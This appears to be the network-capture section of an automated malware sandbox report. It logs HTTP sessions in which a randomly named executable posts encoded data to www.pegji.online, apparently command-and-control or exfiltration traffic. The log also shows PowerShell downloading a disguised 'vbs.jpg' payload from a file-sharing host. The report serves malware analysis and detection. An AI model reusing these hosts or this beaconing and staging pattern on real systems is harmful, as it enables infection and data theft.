                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                                                                      Nov 26, 2024 09:50:53.107101917 CET1236INData Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a
                                                                                                      Data Ascii: nsform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}
                                                                                                      Nov 26, 2024 09:50:53.107116938 CET448INData Raw: 31 39 36 2d 34 2e 31 2d 32 35 2e 37 2d 31 2e 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d
                                                                                                      Data Ascii: 196-4.1-25.7-1.774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.71
                                                                                                      Nov 26, 2024 09:50:53.107145071 CET1236INData Raw: 31 30 32 2d 31 31 34 2e 39 20 31 38 2e 31 39 34 2d 35 35 2e 35 34 32 20 31 39 2e 38 38 34 2d 31 31 32 2e 31 35 37 20 33 36 2e 34 39 2d 31 36 37 2e 38 34 39 20 35 35 2e 39 36 33 2d 32 30 2e 38 31 20 37 2e 32 37 35 2d 34 34 2e 39 31 20 31 38 2e 36
                                                                                                      Data Ascii: 102-114.9 18.194-55.542 19.884-112.157 36.49-167.849 55.963-20.81 7.275-44.91 18.606-48.766 41.922z"/> </defs> <g fill="none" fill-rule="evenodd"> <path fill="#FFF" d="M0 0H1366V800H0z" transform="translate(-448 -157)"/>
                                                                                                      Nov 26, 2024 09:50:53.107156992 CET1236INData Raw: 2e 39 34 38 2d 32 2e 37 36 39 20 31 30 2e 35 30 37 2d 33 2e 31 39 36 20 32 2e 35 35 38 2d 33 34 2e 38 30 35 20 32 33 2e 35 32 36 2d 39 39 2e 35 34 20 31 32 2e 33 37 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31
                                                                                                      Data Ascii: .948-2.769 10.507-3.196 2.558-34.805 23.526-99.54 12.379" transform="translate(161 68)"/> <path fill="#FFDA7F" d="M5.679 131.837c-6.522 1.646-.275 6.91 9.492 12.14 9.767 5.229 28.24 10.257 44.267 10.015 16.028-.243 37.48-.481 5
                                                                                                      Nov 26, 2024 09:50:53.107168913 CET448INData Raw: 39 2e 30 31 36 63 2d 2e 36 39 34 2e 31 33 2d 31 2e 34 34 36 2e 36 31 2d 31 2e 37 37 34 20 31 2e 30 39 38 2d 2e 31 36 38 2e 32 34 38 2d 2e 33 2e 35 31 32 2d 2e 33 31 37 2e 37 39 32 2d 2e 30 31 37 2e 33 31 33 2e 31 35 34 2e 35 30 33 2e 32 39 2e 37
                                                                                                      Data Ascii: 9.016c-.694.13-1.446.61-1.774 1.098-.168.248-.3.512-.317.792-.017.313.154.503.29.776.249.494 1.245.392 1.22-.162-.014-.274.33-.612.54-.817.367-.361.75-.62.923-1.075.154-.404-.413-.7-.882-.612M51.621 9.247c-.182-.409-.68-.325-.615.364.063.687.0
                                                                                                      Nov 26, 2024 09:50:53.107182026 CET1236INData Raw: 38 36 2d 2e 37 35 33 2d 2e 39 33 2d 31 2e 34 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d
                                                                                                      Data Ascii: 86-.753-.93-1.43-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.5
                                                                                                      Nov 26, 2024 09:50:53.107192993 CET1236INData Raw: 31 2e 31 37 33 20 31 2e 31 36 38 2e 34 30 38 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d
                                                                                                      Data Ascii: 1.173 1.168.408 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.
                                                                                                      Nov 26, 2024 09:50:53.107204914 CET448INData Raw: 2e 31 33 2e 35 32 31 2d 2e 30 35 34 20 31 2e 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e
                                                                                                      Data Ascii: .13.521-.054 1.021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.03
                                                                                                      Nov 26, 2024 09:50:53.107285976 CET1236INData Raw: 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e
                                                                                                      Data Ascii: .366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.
                                                                                                      Nov 26, 2024 09:50:53.227571011 CET1236INData Raw: 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34
                                                                                                      Data Ascii: 15.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.4


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.949950185.151.30.221803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:50:59.484559059 CET785OUTPOST /8c06/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Host: www.pegji.online
                                                                                                      Origin: http://www.pegji.online
                                                                                                      Referer: http://www.pegji.online/8c06/
                                                                                                      Content-Length: 192
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Data Raw: 74 48 76 3d 4c 36 62 32 61 43 73 6b 77 65 31 39 38 73 75 43 77 31 75 76 38 35 73 58 79 6e 52 4c 32 64 68 6d 53 4b 65 56 76 77 78 4a 6d 35 4f 64 39 79 31 53 39 52 74 6d 73 6d 4b 58 6b 49 38 61 44 4f 61 41 6b 78 45 6a 4d 4c 42 70 57 51 48 45 5a 78 30 49 66 34 64 62 6a 4f 56 69 70 63 39 67 4c 30 30 77 54 34 76 38 2f 68 2f 6f 30 76 70 6d 35 6f 33 77 30 76 45 52 35 31 57 44 2f 45 36 37 32 41 77 68 37 6a 6c 7a 54 52 33 7a 2b 42 70 33 38 65 4e 4a 49 6b 77 74 6e 59 76 36 2b 4e 45 79 36 32 68 7a 38 47 73 72 46 31 62 45 77 38 4d 2f 38 2f 77 6e 55 45 41 35 35 6c 6f 6e 33 6c 77 59
                                                                                                      Data Ascii: tHv=L6b2aCskwe198suCw1uv85sXynRL2dhmSKeVvwxJm5Od9y1S9RtmsmKXkI8aDOaAkxEjMLBpWQHEZx0If4dbjOVipc9gL00wT4v8/h/o0vpm5o3w0vER51WD/E672Awh7jlzTR3z+Bp38eNJIkwtnYv6+NEy62hz8GsrF1bEw8M/8/wnUEA55lon3lwY
                                                                                                      Nov 26, 2024 09:51:00.868699074 CET110INHTTP/1.1 301
                                                                                                      content-length: 0
                                                                                                      location: https://www.pegji.online/8c06/
                                                                                                      x-via: ASH1
                                                                                                      connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.949957185.151.30.221803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:51:02.361432076 CET809OUTPOST /8c06/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Host: www.pegji.online
                                                                                                      Origin: http://www.pegji.online
                                                                                                      Referer: http://www.pegji.online/8c06/
                                                                                                      Content-Length: 216
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Data Raw: 74 48 76 3d 4c 36 62 32 61 43 73 6b 77 65 31 39 38 4e 65 43 6a 43 61 76 37 5a 73 51 38 48 52 4c 38 39 68 69 53 4b 53 56 76 30 4a 5a 6d 4d 57 64 34 6e 4a 53 2b 53 31 6d 70 6d 4b 58 71 6f 38 66 41 2b 61 31 6b 78 49 64 4d 4f 35 70 57 54 37 45 5a 30 51 49 66 70 64 63 69 65 56 33 78 73 39 75 46 55 30 77 54 34 76 38 2f 68 62 43 30 76 78 6d 36 59 48 77 79 4d 63 53 36 31 57 63 34 45 36 37 6e 51 77 74 37 6a 6c 42 54 51 71 6b 2b 43 52 33 38 65 39 4a 4c 77 73 73 75 59 76 38 6a 64 45 73 78 47 56 36 77 58 39 30 46 58 4c 76 78 4e 74 5a 32 2b 51 35 46 32 4a 69 73 79 6f 41 77 43 35 77 42 33 71 63 33 65 68 63 7a 79 6e 32 38 78 6d 6f 68 79 48 54 75 41 3d 3d
                                                                                                      Data Ascii: tHv=L6b2aCskwe198NeCjCav7ZsQ8HRL89hiSKSVv0JZmMWd4nJS+S1mpmKXqo8fA+a1kxIdMO5pWT7EZ0QIfpdcieV3xs9uFU0wT4v8/hbC0vxm6YHwyMcS61Wc4E67nQwt7jlBTQqk+CR38e9JLwssuYv8jdEsxGV6wX90FXLvxNtZ2+Q5F2JisyoAwC5wB3qc3ehczyn28xmohyHTuA==
                                                                                                      Nov 26, 2024 09:51:03.849414110 CET110INHTTP/1.1 301
                                                                                                      content-length: 0
                                                                                                      location: https://www.pegji.online/8c06/
                                                                                                      x-via: ASH1
                                                                                                      connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.949966185.151.30.221803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:51:05.169912100 CET1822OUTPOST /8c06/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Host: www.pegji.online
                                                                                                      Origin: http://www.pegji.online
                                                                                                      Referer: http://www.pegji.online/8c06/
                                                                                                      Content-Length: 1228
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Data Raw: 74 48 76 3d 4c 36 62 32 61 43 73 6b 77 65 31 39 38 4e 65 43 6a 43 61 76 37 5a 73 51 38 48 52 4c 38 39 68 69 53 4b 53 56 76 30 4a 5a 6d 4d 65 64 6b 42 64 53 2b 7a 31 6d 75 6d 4b 58 30 34 38 65 41 2b 61 53 6b 31 73 42 4d 50 45 63 57 57 2f 45 59 53 63 49 49 71 46 63 6f 65 56 33 34 4d 39 76 4c 30 30 70 54 35 44 77 2f 68 72 43 30 76 78 6d 36 65 4c 77 79 66 45 53 38 31 57 44 2f 45 37 36 32 41 77 4a 37 6a 74 52 54 51 76 5a 2b 79 78 33 39 2b 74 4a 59 31 77 73 68 59 76 45 67 64 46 2f 78 47 49 69 77 58 67 4c 46 57 2f 46 78 4b 42 5a 33 4b 6c 63 52 33 6b 30 79 6a 49 64 7a 54 4a 51 45 33 2b 35 2f 50 41 43 78 78 48 4c 39 68 71 32 6b 54 61 4c 71 65 58 46 6c 34 54 41 2b 6b 62 76 64 2b 5a 6a 66 63 4a 67 68 77 6a 54 38 2b 4c 50 41 59 58 63 4b 68 33 4f 6f 48 72 38 7a 38 4d 66 69 35 57 7a 34 6b 33 5a 4e 68 62 67 72 4a 50 50 51 72 4c 48 78 33 71 44 50 55 66 53 30 4e 61 54 4e 49 62 72 4f 64 7a 4f 72 35 55 2f 44 6b 35 51 4d 6a 77 48 44 58 38 54 68 4a 37 76 6c 52 36 68 47 63 66 69 6f 58 72 33 49 36 35 78 77 4c 39 47 6f 55 [TRUNCATED]
                                                                                                      Data Ascii: tHv=L6b2aCskwe198NeCjCav7ZsQ8HRL89hiSKSVv0JZmMedkBdS+z1mumKX048eA+aSk1sBMPEcWW/EYScIIqFcoeV34M9vL00pT5Dw/hrC0vxm6eLwyfES81WD/E762AwJ7jtRTQvZ+yx39+tJY1wshYvEgdF/xGIiwXgLFW/FxKBZ3KlcR3k0yjIdzTJQE3+5/PACxxHL9hq2kTaLqeXFl4TA+kbvd+ZjfcJghwjT8+LPAYXcKh3OoHr8z8Mfi5Wz4k3ZNhbgrJPPQrLHx3qDPUfS0NaTNIbrOdzOr5U/Dk5QMjwHDX8ThJ7vlR6hGcfioXr3I65xwL9GoUOKVOgIq2KvveKo3aTS9rHRe1zwd0MmpAEQBrSHjOafBW1hrcHG2RuJ+7kttGZxzetPEdShC8cAdtEf55zQPmevqiBsyCZoZjAFsz3vXLVUAJDfCdnB6awqoVxYnDS6QnVI3QiHHvH/klyiwoQVjygXCyTKY1+OJl99kHad0ZkgOvkeJmEHJ79HlCWp/DFBo4/qwxchQLeVlbCuyd8LLgQ8hE/Tz/ZCSbkHkiBpwewiK+KhxV52VAI9B42cpMGx9csUDV1K5fziEr8fPvO7Rrh8hZGzQn08ZBg0VEfFuc/OKkL7Klxf9iPAfV31rQxvfbSYpHKY6OgO5fmsexNyLMrris/uLJoYd57sy8v2IyqM0vcJnjWoXFmNSzs+epunnXzxQX1qMvtYZgsUGUnBAoPK2VWorU1Lkwd1reQO899ifZ5x9dKDj+jliCqbtb4mSuzDCGv1aylgzM/jmOgI86lDJriwqQfzTzvvWRJcO//dumqOJVCc3qJ1w6+61d/zpJn2X/V+dwZbJLaj5HwKs6KpbVNIL/ojb5SmseZfKhfdA4JGnNcaEOjLmBuIGlJmCNBpW5JE7UG4ZYK9zBL4RiOChII7vGQg7oHnAEdlduf162ydaIPcKYvmsaFTG3QVmzz6uSrUKRS+p5Tqqsy28g8qY0VvcWDPF37u [TRUNCATED]
                                                                                                      Nov 26, 2024 09:51:06.613801956 CET110INHTTP/1.1 301
                                                                                                      content-length: 0
                                                                                                      location: https://www.pegji.online/8c06/
                                                                                                      x-via: ASH1
                                                                                                      connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.949972185.151.30.221803000C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 26, 2024 09:51:07.820318937 CET524OUTGET /8c06/?tHv=G4zWZ0Nj9PVJ//SN6EOJwpki1UYI7dgFbJbLjGF7v5OX+CcR7h02x2GjssIYZd7u3AEUas9bYAKQeEUSIZlmjpsG1PZQEmg3WvSe6jra0p9x5IWDpQ==&ozM=pHXpHpbXjHh HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Host: www.pegji.online
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                      Nov 26, 2024 09:51:09.262494087 CET310INHTTP/1.1 301
                                                                                                      date: Tue, 26 Nov 2024 08:51:09 GMT
                                                                                                      content-length: 0
                                                                                                      location: https://www.pegji.online/8c06/?tHv=G4zWZ0Nj9PVJ//SN6EOJwpki1UYI7dgFbJbLjGF7v5OX+CcR7h02x2GjssIYZd7u3AEUas9bYAKQeEUSIZlmjpsG1PZQEmg3WvSe6jra0p9x5IWDpQ==&ozM=pHXpHpbXjHh
                                                                                                      x-cdn-cache-status: MISS
                                                                                                      x-via: ASH1
                                                                                                      connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.949738193.30.119.2054437184C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-11-26 08:49:23 UTC211OUTGET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                                                      Host: 3105.filemail.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-11-26 08:49:23 UTC328INHTTP/1.1 200 OK
                                                                                                      Content-Length: 2230233
                                                                                                      Content-Type: image/jpeg
                                                                                                      Last-Modified: Mon, 25 Nov 2024 10:41:01 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      ETag: 67ad55be8fbd7389b2f5ef2b123a44b4
                                                                                                      X-Transfer-ID: ibybhsntnwgamsn
                                                                                                      Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                                                                      Date: Tue, 26 Nov 2024 08:49:22 GMT
                                                                                                      Connection: close
                                                                                                      2024-11-26 08:49:23 UTC505INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                      2024-11-26 08:49:23 UTC8192INData Raw: b1 5e ae 3d f0 8a 6f 8c 03 12 18 0a 66 fa e4 1f 52 94 de 05 8a b3 95 47 5a 3e ad c7 28 ee 4f 04 81 f3 c0 88 35 b3 14 d8 63 65 75 3b 58 b7 00 fc 47 38 73 21 75 ef 5f 01 c7 e7 83 2e 08 1e a5 3f 2c af a9 7e 58 16 57 21 a8 f1 96 0d b5 3f 17 a7 b6 00 06 24 e5 b7 88 d4 5b 0b f6 38 17 d4 6a e3 86 3d e5 88 3e c3 be 67 41 e3 1f be 3e 6a 7a 5b 81 b7 b6 57 58 85 a5 0c d6 18 ff 00 09 ed f2 c1 08 29 8e 06 aa 6a 16 4f de a3 82 3a 1f 71 97 33 6e 16 1b 33 f4 cc 56 6d 8a 6d 1b bf b1 f7 c6 d8 50 e1 af 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4
                                                                                                      Data Ascii: ^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5
                                                                                                      2024-11-26 08:49:23 UTC8192INData Raw: 91 da f3 c9 cf a7 2d a6 74 89 02 ba 9b 06 f9 3f 0c 26 92 57 96 1d 93 42 bb 85 00 79 c0 f5 6d f6 cf 46 ac a3 ee f2 59 e9 ce 4b 7d b5 d3 2a 95 1a 69 0f bd 1c f2 93 40 ad 22 8d a0 05 37 63 26 56 56 50 3c b0 9f 11 df 03 d3 af db 9d 23 31 bd 2c 82 be 38 17 fb 47 a0 d6 78 a2 6a 04 12 07 58 f6 d9 3f 87 9b cf 39 19 8a bd 51 82 47 5b cb 46 e8 35 72 b0 50 bb aa 97 b5 56 06 ea 7d b4 8d f5 cf a7 92 02 11 47 a4 a9 fc 58 e9 fb 5f a6 50 2b 4c e5 7a 13 79 e1 bc 42 2a 61 a9 8d 02 c8 a6 d9 47 42 31 cd 36 a9 75 11 2d 46 a2 c7 3f 3c 0f 58 df 6c 34 ca 50 9d 34 84 31 03 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec
                                                                                                      Data Ascii: -t?&WBymFYK}*i@"7c&VVP<#1,8GxjX?9QG[F5rPV}GX_P+LzyB*aGB16u-F?<Xl4P411Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Q
                                                                                                      2024-11-26 08:49:23 UTC8192INData Raw: 22 97 bf 40 0d f6 27 0b aa f1 6d 1f 87 c6 22 0e 24 91 46 d1 1c 7f c2 45 8e 4f 6e 95 99 7b 3c 5f c5 90 05 8c 41 a6 6b 62 45 20 6b b2 49 fe 23 77 db 8c 77 4d f6 77 4d 04 81 a6 dd 3b 5f a4 6d 2a a3 91 db be 07 86 f1 9d 56 a7 c5 7c 60 95 8a 35 25 68 28 e9 43 9e b8 74 f0 75 5d 0b 12 db a7 03 77 e2 b5 3f 0c 37 8d 6a 61 6f b4 51 bc 68 5a 28 e2 f2 d8 85 6a 52 2f 8c d3 d2 37 a0 3e ef c5 c8 e0 8a c0 c9 f0 cd 73 47 3c 5a 69 01 28 d2 28 01 85 90 db 85 1c b4 ce 91 78 56 99 24 2c d1 cc 01 6e 6f 69 1d 19 6f a7 c7 dc 58 c6 f5 7a 00 be 27 a4 d4 c6 86 9a 64 0c 07 66 dc 39 cb c9 a0 fb e7 84 c4 81 4e e5 1b 85 9a e7 a6 07 43 a8 95 34 e9 b7 4f 24 aa 16 96 45 60 55 be 3f eb a6 0b 5a 27 d5 a4 4a ba 49 54 ac 81 ad aa bf 9e 2b a2 d6 cd e1 c1 a3 91 19 94 1f c2 7a fd 0e 69 b6 b2 49
                                                                                                      Data Ascii: "@'m"$FEOn{<_AkbE kI#wwMwM;_m*V|`5%h(Ctu]w?7jaoQhZ(jR/7>sG<Zi((xV$,noioXz'df9NC4O$E`U?Z'JIT+ziI
